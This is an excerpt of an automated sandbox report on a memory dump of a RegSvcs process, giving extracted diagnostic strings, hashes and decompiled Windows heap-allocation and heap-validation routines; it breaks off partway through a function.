                                          • String ID: $ $ $ $0$3$7$7$A$A$A$A$B$B$B$B$B$B$B$C$C$C$C$C$C$C$C$C$C$C$C$D$E$E$E$F$G$G$I$K$K$M$M$M$O$O$O$P$P$Q$S$S$S$S$S$S$S$S$T$T$U$U$V$Y$\$\$\$\$\$\$a$a$a$a$a$a$a$a$a$a$a$b$c$c$c$d$d$d$d$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$f$f$f$g$g$h$h$i$i$i$i$i$i$i$i$i$i$j$k$k$k$l$l$l$l$l$l$m$m$m$m$m$m$m$m$m$n$n$n$n$n$n$n$n$n$n$n$n$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$p$p$p$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$s$s$s$s$s$t$t$t$t$t$t$t$t$t$t$t$t$u$u$u$u$u$u$v$v$w$w$w$w$w$w$w$w$w$w$y
                                          • API String ID: 0-3432132569
                                          • Opcode ID: 0f6616884ceb20d3e75de271bb9417fe4150508218268d80cfa9ddf3cbd4b58b
                                          • Instruction ID: 863fbf5347be887f7057d4e126217049090c9b3795fb353c5ab9518572d6fef4
                                          • Opcode Fuzzy Hash: 0f6616884ceb20d3e75de271bb9417fe4150508218268d80cfa9ddf3cbd4b58b
                                          • Instruction Fuzzy Hash: BF92EFB18007189EDB25DF51C849BEABBB9BF04708F4046ED910D6A252DBB95BCCCF94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • *** enter .cxr %p for the context, xrefs: 013AB50D
                                          • The instruction at %p tried to %s , xrefs: 013AB4B6
                                          • read from, xrefs: 013AB4AD, 013AB4B2
                                          • The instruction at %p referenced memory at %p., xrefs: 013AB432
                                          • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 013AB47D
                                          • The resource is owned shared by %d threads, xrefs: 013AB37E
                                          • *** enter .exr %p for the exception record, xrefs: 013AB4F1
                                          • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 013AB2DC
                                          • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 013AB39B
                                          • a NULL pointer, xrefs: 013AB4E0
                                          • *** then kb to get the faulting stack, xrefs: 013AB51C
                                          • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 013AB305
                                          • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 013AB38F
                                          • This failed because of error %Ix., xrefs: 013AB446
                                          • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 013AB53F
                                          • *** A stack buffer overrun occurred in %ws:%s, xrefs: 013AB2F3
                                          • *** Resource timeout (%p) in %ws:%s, xrefs: 013AB352
                                          • Go determine why that thread has not released the critical section., xrefs: 013AB3C5
                                          • The critical section is owned by thread %p., xrefs: 013AB3B9
                                          • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 013AB314
                                          • an invalid address, %p, xrefs: 013AB4CF
                                          • <unknown>, xrefs: 013AB27E, 013AB2D1, 013AB350, 013AB399, 013AB417, 013AB48E
                                          • *** An Access Violation occurred in %ws:%s, xrefs: 013AB48F
                                          • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 013AB476
                                          • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 013AB323
                                          • The resource is owned exclusively by thread %p, xrefs: 013AB374
                                          • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 013AB3D6
                                          • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 013AB484
                                          • write to, xrefs: 013AB4A6
                                          • *** Inpage error in %ws:%s, xrefs: 013AB418
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                          • API String ID: 0-108210295
                                          • Opcode ID: a22e6c88b62a729835bc1540c8218a775af2d541cf305a31a002bc6d551a7411
                                          • Instruction ID: 3a3b55f300012cfd235f8cf568457d530843f9f5ce64dfea32008e11ca604b62
                                          • Opcode Fuzzy Hash: a22e6c88b62a729835bc1540c8218a775af2d541cf305a31a002bc6d551a7411
                                          • Instruction Fuzzy Hash: E0812335A10204FFDB21BB6ACC49EBB7F7AEF56A59FC14048F5052B116E3618851CBB2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 44%
                                          			E013B1C06() {
                                          				signed int _t27;
                                          				char* _t104;
                                          				char* _t105;
                                          				intOrPtr _t113;
                                          				intOrPtr _t115;
                                          				intOrPtr _t117;
                                          				intOrPtr _t119;
                                          				intOrPtr _t120;
                                          
                                          				_t105 = 0x12d48a4;
                                          				_t104 = "HEAP: ";
                                          				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                          					_push(_t104);
                                          					E012FB150();
                                          				} else {
                                          					E012FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          				}
                                          				_push( *0x13e589c);
                                          				E012FB150("Heap error detected at %p (heap handle %p)\n",  *0x13e58a0);
                                          				_t27 =  *0x13e5898; // 0x0
                                          				if(_t27 <= 0xf) {
                                          					switch( *((intOrPtr*)(_t27 * 4 +  &M013B1E96))) {
                                          						case 0:
                                          							_t105 = "heap_failure_internal";
                                          							goto L21;
                                          						case 1:
                                          							goto L21;
                                          						case 2:
                                          							goto L21;
                                          						case 3:
                                          							goto L21;
                                          						case 4:
                                          							goto L21;
                                          						case 5:
                                          							goto L21;
                                          						case 6:
                                          							goto L21;
                                          						case 7:
                                          							goto L21;
                                          						case 8:
                                          							goto L21;
                                          						case 9:
                                          							goto L21;
                                          						case 0xa:
                                          							goto L21;
                                          						case 0xb:
                                          							goto L21;
                                          						case 0xc:
                                          							goto L21;
                                          						case 0xd:
                                          							goto L21;
                                          						case 0xe:
                                          							goto L21;
                                          						case 0xf:
                                          							goto L21;
                                          					}
                                          				}
                                          				L21:
                                          				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                          					_push(_t104);
                                          					E012FB150();
                                          				} else {
                                          					E012FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          				}
                                          				_push(_t105);
                                          				E012FB150("Error code: %d - %s\n",  *0x13e5898);
                                          				_t113 =  *0x13e58a4; // 0x0
                                          				if(_t113 != 0) {
                                          					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                          						_push(_t104);
                                          						E012FB150();
                                          					} else {
                                          						E012FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          					}
                                          					E012FB150("Parameter1: %p\n",  *0x13e58a4);
                                          				}
                                          				_t115 =  *0x13e58a8; // 0x0
                                          				if(_t115 != 0) {
                                          					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                          						_push(_t104);
                                          						E012FB150();
                                          					} else {
                                          						E012FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          					}
                                          					E012FB150("Parameter2: %p\n",  *0x13e58a8);
                                          				}
                                          				_t117 =  *0x13e58ac; // 0x0
                                          				if(_t117 != 0) {
                                          					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                          						_push(_t104);
                                          						E012FB150();
                                          					} else {
                                          						E012FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          					}
                                          					E012FB150("Parameter3: %p\n",  *0x13e58ac);
                                          				}
                                          				_t119 =  *0x13e58b0; // 0x0
                                          				if(_t119 != 0) {
                                          					L41:
                                          					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                          						_push(_t104);
                                          						E012FB150();
                                          					} else {
                                          						E012FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          					}
                                          					_push( *0x13e58b4);
                                          					E012FB150("Last known valid blocks: before - %p, after - %p\n",  *0x13e58b0);
                                          				} else {
                                          					_t120 =  *0x13e58b4; // 0x0
                                          					if(_t120 != 0) {
                                          						goto L41;
                                          					}
                                          				}
                                          				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                          					_push(_t104);
                                          					E012FB150();
                                          				} else {
                                          					E012FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          				}
                                          				return E012FB150("Stack trace available at %p\n", 0x13e58c0);
                                          			}












                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                          • API String ID: 0-2897834094
                                          • Opcode ID: dd7347e4569e74eeed25edc41209b2427fdf907d98b063c44af7dce4f4701694
                                          • Instruction ID: 142ce8e72c2d5b704d45649c61254f78331770ac434b903f07ac1de93c6f4c5a
                                          • Opcode Fuzzy Hash: dd7347e4569e74eeed25edc41209b2427fdf907d98b063c44af7dce4f4701694
                                          • Instruction Fuzzy Hash: 1461B537631149DFD621AB49F4E9D75B7E8EB04A28F4A803EF70D5BB41E73498408B1A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 64%
                                          			E013B2D82(void* __ebx, intOrPtr* __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
                                          				signed int _t83;
                                          				signed char _t89;
                                          				intOrPtr _t90;
                                          				signed char _t101;
                                          				signed int _t102;
                                          				intOrPtr _t104;
                                          				signed int _t105;
                                          				signed int _t106;
                                          				intOrPtr _t108;
                                          				intOrPtr _t112;
                                          				short* _t130;
                                          				short _t131;
                                          				signed int _t148;
                                          				intOrPtr _t149;
                                          				signed int* _t154;
                                          				short* _t165;
                                          				signed int _t171;
                                          				void* _t182;
                                          
                                          				_push(0x44);
                                          				_push(0x13d0e80);
                                          				E0134D0E8(__ebx, __edi, __esi);
                                          				_t177 = __edx;
                                          				_t181 = __ecx;
                                          				 *((intOrPtr*)(_t182 - 0x44)) = __ecx;
                                          				 *((char*)(_t182 - 0x1d)) = 0;
                                          				 *(_t182 - 0x24) = 0;
                                          				if(( *(__ecx + 0x44) & 0x01000000) == 0) {
                                          					 *((intOrPtr*)(_t182 - 4)) = 0;
                                          					 *((intOrPtr*)(_t182 - 4)) = 1;
                                          					_t83 = E012F40E1("RtlAllocateHeap");
                                          					__eflags = _t83;
                                          					if(_t83 == 0) {
                                          						L48:
                                          						 *(_t182 - 0x24) = 0;
                                          						L49:
                                          						 *((intOrPtr*)(_t182 - 4)) = 0;
                                          						 *((intOrPtr*)(_t182 - 4)) = 0xfffffffe;
                                          						E013B30C4();
                                          						goto L50;
                                          					}
                                          					_t89 =  *(__ecx + 0x44) | __edx | 0x10000100;
                                          					 *(_t182 - 0x28) = _t89;
                                          					 *(_t182 - 0x3c) = _t89;
                                          					_t177 =  *(_t182 + 8);
                                          					__eflags = _t177;
                                          					if(_t177 == 0) {
                                          						_t171 = 1;
                                          						__eflags = 1;
                                          					} else {
                                          						_t171 = _t177;
                                          					}
                                          					_t148 =  *((intOrPtr*)(_t181 + 0x94)) + _t171 &  *(_t181 + 0x98);
                                          					__eflags = _t148 - 0x10;
                                          					if(_t148 < 0x10) {
                                          						_t148 = 0x10;
                                          					}
                                          					_t149 = _t148 + 8;
                                          					 *((intOrPtr*)(_t182 - 0x48)) = _t149;
                                          					__eflags = _t149 - _t177;
                                          					if(_t149 < _t177) {
                                          						L44:
                                          						_t90 =  *[fs:0x30];
                                          						__eflags =  *(_t90 + 0xc);
                                          						if( *(_t90 + 0xc) == 0) {
                                          							_push("HEAP: ");
                                          							E012FB150();
                                          						} else {
                                          							E012FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          						}
                                          						_push( *((intOrPtr*)(_t181 + 0x78)));
                                          						E012FB150("Invalid allocation size - %Ix (exceeded %Ix)\n", _t177);
                                          						goto L48;
                                          					} else {
                                          						__eflags = _t149 -  *((intOrPtr*)(_t181 + 0x78));
                                          						if(_t149 >  *((intOrPtr*)(_t181 + 0x78))) {
                                          							goto L44;
                                          						}
                                          						__eflags = _t89 & 0x00000001;
                                          						if((_t89 & 0x00000001) != 0) {
                                          							_t178 =  *(_t182 - 0x28);
                                          						} else {
                                          							E0130EEF0( *((intOrPtr*)(_t181 + 0xc8)));
                                          							 *((char*)(_t182 - 0x1d)) = 1;
                                          							_t178 =  *(_t182 - 0x28) | 0x00000001;
                                          							 *(_t182 - 0x3c) =  *(_t182 - 0x28) | 0x00000001;
                                          						}
                                          						E013B4496(_t181, 0);
                                          						_t177 = L01314620(_t181, _t181, _t178,  *(_t182 + 8));
                                          						 *(_t182 - 0x24) = _t177;
                                          						_t173 = 1;
                                          						E013B49A4(_t181);
                                          						__eflags = _t177;
                                          						if(_t177 == 0) {
                                          							goto L49;
                                          						} else {
                                          							_t177 = _t177 + 0xfffffff8;
                                          							__eflags =  *((char*)(_t177 + 7)) - 5;
                                          							if( *((char*)(_t177 + 7)) == 5) {
                                          								_t177 = _t177 - (( *(_t177 + 6) & 0x000000ff) << 3);
                                          								__eflags = _t177;
                                          							}
                                          							_t154 = _t177;
                                          							 *(_t182 - 0x40) = _t177;
                                          							__eflags =  *(_t181 + 0x4c);
                                          							if( *(_t181 + 0x4c) != 0) {
                                          								 *_t177 =  *_t177 ^  *(_t181 + 0x50);
                                          								__eflags =  *(_t177 + 3) - (_t154[0] ^ _t154[0] ^  *_t154);
                                          								if(__eflags != 0) {
                                          									_push(_t154);
                                          									_t173 = _t177;
                                          									E013AFA2B(0, _t181, _t177, _t177, _t181, __eflags);
                                          								}
                                          							}
                                          							__eflags =  *(_t177 + 2) & 0x00000002;
                                          							if(( *(_t177 + 2) & 0x00000002) == 0) {
                                          								_t101 =  *(_t177 + 3);
                                          								 *(_t182 - 0x29) = _t101;
                                          								_t102 = _t101 & 0x000000ff;
                                          							} else {
                                          								_t130 = E012F1F5B(_t177);
                                          								 *((intOrPtr*)(_t182 - 0x30)) = _t130;
                                          								__eflags =  *(_t181 + 0x40) & 0x08000000;
                                          								if(( *(_t181 + 0x40) & 0x08000000) == 0) {
                                          									 *_t130 = 0;
                                          								} else {
                                          									_t131 = E013216C7(1, _t173);
                                          									_t165 =  *((intOrPtr*)(_t182 - 0x30));
                                          									 *_t165 = _t131;
                                          									_t130 = _t165;
                                          								}
                                          								_t102 =  *(_t130 + 2) & 0x0000ffff;
                                          							}
                                          							 *(_t182 - 0x34) = _t102;
                                          							 *(_t182 - 0x28) = _t102;
                                          							__eflags =  *(_t181 + 0x4c);
                                          							if( *(_t181 + 0x4c) != 0) {
                                          								 *(_t177 + 3) =  *(_t177 + 2) ^  *(_t177 + 1) ^  *_t177;
                                          								 *_t177 =  *_t177 ^  *(_t181 + 0x50);
                                          								__eflags =  *_t177;
                                          							}
                                          							__eflags =  *(_t181 + 0x40) & 0x20000000;
                                          							if(( *(_t181 + 0x40) & 0x20000000) != 0) {
                                          								__eflags = 0;
                                          								E013B4496(_t181, 0);
                                          							}
                                          							__eflags =  *(_t182 - 0x24) -  *0x13e6360; // 0x0
                                          							_t104 =  *[fs:0x30];
                                          							if(__eflags != 0) {
                                          								_t105 =  *(_t104 + 0x68);
                                          								 *(_t182 - 0x4c) = _t105;
                                          								__eflags = _t105 & 0x00000800;
                                          								if((_t105 & 0x00000800) == 0) {
                                          									goto L49;
                                          								}
                                          								_t106 =  *(_t182 - 0x34);
                                          								__eflags = _t106;
                                          								if(_t106 == 0) {
                                          									goto L49;
                                          								}
                                          								__eflags = _t106 -  *0x13e6364; // 0x0
                                          								if(__eflags != 0) {
                                          									goto L49;
                                          								}
                                          								__eflags =  *((intOrPtr*)(_t181 + 0x7c)) -  *0x13e6366; // 0x0
                                          								if(__eflags != 0) {
                                          									goto L49;
                                          								}
                                          								_t108 =  *[fs:0x30];
                                          								__eflags =  *(_t108 + 0xc);
                                          								if( *(_t108 + 0xc) == 0) {
                                          									_push("HEAP: ");
                                          									E012FB150();
                                          								} else {
                                          									E012FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          								}
                                          								_push(E0139D455(_t181,  *(_t182 - 0x28)));
                                          								_push( *(_t182 + 8));
                                          								E012FB150("Just allocated block at %p for 0x%Ix bytes with tag %ws\n",  *(_t182 - 0x24));
                                          								goto L34;
                                          							} else {
                                          								__eflags =  *(_t104 + 0xc);
                                          								if( *(_t104 + 0xc) == 0) {
                                          									_push("HEAP: ");
                                          									E012FB150();
                                          								} else {
                                          									E012FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          								}
                                          								_push( *(_t182 + 8));
                                          								E012FB150("Just allocated block at %p for %Ix bytes\n",  *0x13e6360);
                                          								L34:
                                          								_t112 =  *[fs:0x30];
                                          								__eflags =  *((char*)(_t112 + 2));
                                          								if( *((char*)(_t112 + 2)) != 0) {
                                          									 *0x13e6378 = 1;
                                          									 *0x13e60c0 = 0;
                                          									asm("int3");
                                          									 *0x13e6378 = 0;
                                          								}
                                          								goto L49;
                                          							}
                                          						}
                                          					}
                                          				} else {
                                          					_t181 =  *0x13e5708; // 0x0
                                          					 *0x13eb1e0(__ecx, __edx,  *(_t182 + 8));
                                          					 *_t181();
                                          					L50:
                                          					return E0134D130(0, _t177, _t181);
                                          				}
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                          • API String ID: 3446177414-1745908468
                                          • Opcode ID: afba1f6a0dd18be39a558dadee606b383d097e1f3025041d6aa8d663489690a9
                                          • Instruction ID: 1f5ae9ae74b1087d9d6dff9f3cea44f4cc287f502a1a0d157f58215126e6b3fe
                                          • Opcode Fuzzy Hash: afba1f6a0dd18be39a558dadee606b383d097e1f3025041d6aa8d663489690a9
                                          • Instruction Fuzzy Hash: F1912531610645DFDB22DF69C494AEEBBF2FF58718F18801DE64A5BB91E732A941CB00
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 59%
                                          			E013B4AEF(void* __ecx, signed int __edx, intOrPtr* _a8, signed int* _a12, signed int* _a16, intOrPtr _a20, intOrPtr _a24) {
                                          				signed int _v6;
                                          				signed int _v8;
                                          				signed int _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				signed int _v24;
                                          				signed int _v28;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				void* __ebp;
                                          				signed int _t189;
                                          				intOrPtr _t191;
                                          				intOrPtr _t210;
                                          				signed int _t225;
                                          				signed char _t231;
                                          				intOrPtr _t232;
                                          				unsigned int _t245;
                                          				intOrPtr _t249;
                                          				intOrPtr _t259;
                                          				signed int _t281;
                                          				signed int _t283;
                                          				intOrPtr _t284;
                                          				signed int _t288;
                                          				signed int* _t294;
                                          				signed int* _t298;
                                          				intOrPtr* _t299;
                                          				intOrPtr* _t300;
                                          				signed int _t307;
                                          				signed int _t309;
                                          				signed short _t312;
                                          				signed short _t315;
                                          				signed int _t317;
                                          				signed int _t320;
                                          				signed int _t322;
                                          				signed int _t326;
                                          				signed int _t327;
                                          				void* _t328;
                                          				signed int _t332;
                                          				signed int _t340;
                                          				signed int _t342;
                                          				signed char _t344;
                                          				signed int* _t345;
                                          				void* _t346;
                                          				signed char _t352;
                                          				signed char _t367;
                                          				signed int _t374;
                                          				intOrPtr* _t378;
                                          				signed int _t380;
                                          				signed int _t385;
                                          				signed char _t390;
                                          				unsigned int _t392;
                                          				signed char _t395;
                                          				unsigned int _t397;
                                          				intOrPtr* _t400;
                                          				signed int _t402;
                                          				signed int _t405;
                                          				intOrPtr* _t406;
                                          				signed int _t407;
                                          				intOrPtr _t412;
                                          				void* _t414;
                                          				signed int _t415;
                                          				signed int _t416;
                                          				signed int _t429;
                                          
                                          				_v16 = _v16 & 0x00000000;
                                          				_t189 = 0;
                                          				_v8 = _v8 & 0;
                                          				_t332 = __edx;
                                          				_v12 = 0;
                                          				_t414 = __ecx;
                                          				_t415 = __edx;
                                          				if(__edx >=  *((intOrPtr*)(__edx + 0x28))) {
                                          					L88:
                                          					_t416 = _v16;
                                          					if( *((intOrPtr*)(_t332 + 0x2c)) == _t416) {
                                          						__eflags =  *((intOrPtr*)(_t332 + 0x30)) - _t189;
                                          						if( *((intOrPtr*)(_t332 + 0x30)) == _t189) {
                                          							L107:
                                          							return 1;
                                          						}
                                          						_t191 =  *[fs:0x30];
                                          						__eflags =  *(_t191 + 0xc);
                                          						if( *(_t191 + 0xc) == 0) {
                                          							_push("HEAP: ");
                                          							E012FB150();
                                          						} else {
                                          							E012FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          						}
                                          						_push(_v12);
                                          						_push( *((intOrPtr*)(_t332 + 0x30)));
                                          						_push(_t332);
                                          						_push("Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)\n");
                                          						L122:
                                          						E012FB150();
                                          						L119:
                                          						return 0;
                                          					}
                                          					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                          						_push("HEAP: ");
                                          						E012FB150();
                                          					} else {
                                          						E012FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          					}
                                          					_push(_t416);
                                          					_push( *((intOrPtr*)(_t332 + 0x2c)));
                                          					_push(_t332);
                                          					_push("Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)\n");
                                          					goto L122;
                                          				} else {
                                          					goto L1;
                                          				}
                                          				do {
                                          					L1:
                                          					 *_a16 = _t415;
                                          					if( *(_t414 + 0x4c) != 0) {
                                          						_t392 =  *(_t414 + 0x50) ^  *_t415;
                                          						 *_t415 = _t392;
                                          						_t352 = _t392 >> 0x00000010 ^ _t392 >> 0x00000008 ^ _t392;
                                          						_t424 = _t392 >> 0x18 - _t352;
                                          						if(_t392 >> 0x18 != _t352) {
                                          							_push(_t352);
                                          							E013AFA2B(_t332, _t414, _t415, _t414, _t415, _t424);
                                          						}
                                          					}
                                          					if(_v8 != ( *(_t415 + 4) ^  *(_t414 + 0x54))) {
                                          						_t210 =  *[fs:0x30];
                                          						__eflags =  *(_t210 + 0xc);
                                          						if( *(_t210 + 0xc) == 0) {
                                          							_push("HEAP: ");
                                          							E012FB150();
                                          						} else {
                                          							E012FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          						}
                                          						_push(_v8 & 0x0000ffff);
                                          						_t340 =  *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff;
                                          						__eflags = _t340;
                                          						_push(_t340);
                                          						E012FB150("Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)\n", _t415);
                                          						L117:
                                          						__eflags =  *(_t414 + 0x4c);
                                          						if( *(_t414 + 0x4c) != 0) {
                                          							 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
                                          							 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                                          							__eflags =  *_t415;
                                          						}
                                          						goto L119;
                                          					}
                                          					_t225 =  *_t415 & 0x0000ffff;
                                          					_t390 =  *(_t415 + 2);
                                          					_t342 = _t225;
                                          					_v8 = _t342;
                                          					_v20 = _t342;
                                          					_v28 = _t225 << 3;
                                          					if((_t390 & 0x00000001) == 0) {
                                          						__eflags =  *(_t414 + 0x40) & 0x00000040;
                                          						_t344 = (_t342 & 0xffffff00 | ( *(_t414 + 0x40) & 0x00000040) != 0x00000000) & _t390 >> 0x00000002;
                                          						__eflags = _t344 & 0x00000001;
                                          						if((_t344 & 0x00000001) == 0) {
                                          							L66:
                                          							_t345 = _a12;
                                          							 *_a8 =  *_a8 + 1;
                                          							 *_t345 =  *_t345 + ( *_t415 & 0x0000ffff);
                                          							__eflags =  *_t345;
                                          							L67:
                                          							_t231 =  *(_t415 + 6);
                                          							if(_t231 == 0) {
                                          								_t346 = _t414;
                                          							} else {
                                          								_t346 = (_t415 & 0xffff0000) - ((_t231 & 0x000000ff) << 0x10) + 0x10000;
                                          							}
                                          							if(_t346 != _t332) {
                                          								_t232 =  *[fs:0x30];
                                          								__eflags =  *(_t232 + 0xc);
                                          								if( *(_t232 + 0xc) == 0) {
                                          									_push("HEAP: ");
                                          									E012FB150();
                                          								} else {
                                          									E012FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          								}
                                          								_push( *(_t415 + 6) & 0x000000ff);
                                          								_push(_t415);
                                          								_push("Heap block at %p has incorrect segment offset (%x)\n");
                                          								goto L95;
                                          							} else {
                                          								if( *((char*)(_t415 + 7)) != 3) {
                                          									__eflags =  *(_t414 + 0x4c);
                                          									if( *(_t414 + 0x4c) != 0) {
                                          										 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
                                          										 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                                          										__eflags =  *_t415;
                                          									}
                                          									_t415 = _t415 + _v28;
                                          									__eflags = _t415;
                                          									goto L86;
                                          								}
                                          								_t245 =  *(_t415 + 0x1c);
                                          								if(_t245 == 0) {
                                          									_t395 =  *_t415 & 0x0000ffff;
                                          									_v6 = _t395 >> 8;
                                          									__eflags = _t415 + _t395 * 8 -  *((intOrPtr*)(_t332 + 0x28));
                                          									if(_t415 + _t395 * 8 ==  *((intOrPtr*)(_t332 + 0x28))) {
                                          										__eflags =  *(_t414 + 0x4c);
                                          										if( *(_t414 + 0x4c) != 0) {
                                          											 *(_t415 + 3) =  *(_t415 + 2) ^ _v6 ^ _t395;
                                          											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                                          											__eflags =  *_t415;
                                          										}
                                          										goto L107;
                                          									}
                                          									_t249 =  *[fs:0x30];
                                          									__eflags =  *(_t249 + 0xc);
                                          									if( *(_t249 + 0xc) == 0) {
                                          										_push("HEAP: ");
